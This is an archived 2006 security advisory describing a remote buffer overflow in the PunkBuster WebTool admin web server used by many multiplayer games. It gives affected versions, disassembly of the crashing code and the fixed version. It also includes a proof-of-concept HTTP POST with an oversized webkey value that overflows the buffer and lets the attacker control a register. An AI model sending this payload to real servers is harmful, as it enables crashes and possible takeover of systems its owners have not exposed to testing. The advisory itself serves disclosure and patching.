PunkBuster-1.229.txt

2006-05-26T00:00:00
ID PACKETSTORM:46719
Type packetstorm
Reporter aluigi.org
Modified 2006-05-26T00:00:00

Description

                                        
                                            `  
#######################################################################  
  
Luigi Auriemma  
  
Application: PunkBuster  
http://www.punkbuster.com  
Versions: PunkBuster for servers, versions minor than v1.229:  
America's Army <= v1.228  
Battlefield 1942 <= v1.158  
Battlefield 2 <= v1.184  
Battlefield Vietnam <= v1.150  
Call of Duty <= v1.173  
Call of Duty 2 <= v1.108  
DOOM 3 <= v1.159  
Enemy Territory <= v1.167  
Far Cry <= v1.150  
F.E.A.R. <= v1.093  
Joint Operations <= v1.187  
Quake III Arena <= v1.150  
Quake 4 <= v1.181  
Rainbow Six 3: Raven Shield <= v1.169  
Rainbow Six 4: Lockdown <= v1.093  
Return to Castle Wolfenstein <= v1.175  
Soldier of Fortune II <= v1.183  
Platforms: Win32, Linux and Mac  
Bug: buffer overflow in the built-in web server for the remote  
server's administration (WebTool)  
Exploitation: remote, versus server  
Date: 23 May 2006  
Author: Luigi Auriemma  
e-mail: aluigi@autistici.org  
web: aluigi.org  
  
  
#######################################################################  
  
  
1) Introduction  
2) Bug  
3) The Code  
4) Fix  
  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
PunkBuster is the anti-cheat system developed by Even Balance  
(http://www.evenbalance.com) officially used and distribuited in  
almost all the most played and famous commercial multiplayer FPS games.  
  
  
#######################################################################  
  
======  
2) Bug  
======  
  
  
PunkBuster contains a built-in HTTP server called WebTool for allowing  
the admins to manage their game servers remotely through a normal web  
browser:  
  
http://www.evenbalance.com/publications/admins/#webtool  
  
This web server is not enabled by default but must be activated  
selecting the TCP port on which running the service using the command:  
pb_sv_httpport PORT  
  
The authentication mechanism is handled through a parameter called  
webkey followed by the password and sent by the client using the POST  
method or directly in the URL.  
  
A webkey longer than 1024 bytes exploits a buffer-overflow which  
happens when the program uses the memcpy function for copying the  
attacker string in a limited buffer used for the comparison with the  
valid service's password.  
  
The following is the code from the pbsv.dll 1.183 of the game Soldier  
of Fortune II where happens the exception which interrupts the game:  
  
...  
0511B3A8 8BB424 58100000 MOV ESI,DWORD PTR SS:[ESP+1058]  
0511B3AF 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]  
0511B3B3 6A 41 PUSH 41  
0511B3B5 50 PUSH EAX  
0511B3B6 C68424 55100000 >MOV BYTE PTR SS:[ESP+1055],0  
0511B3BE FF96 54010000 CALL DWORD PTR DS:[ESI+154]  
0511B3C4 8BBC24 64100000 MOV EDI,DWORD PTR SS:[ESP+1064]  
...  
  
The ESI register is controlled by the attacker.  
The memcpy function described above instead is located at offset  
0512aea7.  
  
  
#######################################################################  
  
===========  
3) The Code  
===========  
  
  
Send the following text file to the port on which is running PunkBuster  
WebTool:  
  
http://aluigi.org/poc/pbwebbof.txt  
  
or simply build and use a link like the following:  
  
http://127.0.0.1:80/pbsvweb/plist=1&webkey=aaaaaaaaaaaaa...1044...aaa  
  
POST /pbsvweb HTTP/1.1  
  
webkey=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccddddeeeeffff  
cmds=Command Screen  
  
  
#######################################################################  
  
======  
4) Fix  
======  
  
  
Versions v1.229 and above.  
  
  
#######################################################################  
  
  
---   
Luigi Auriemma  
http://aluigi.org  
http://mirror.aluigi.org  
`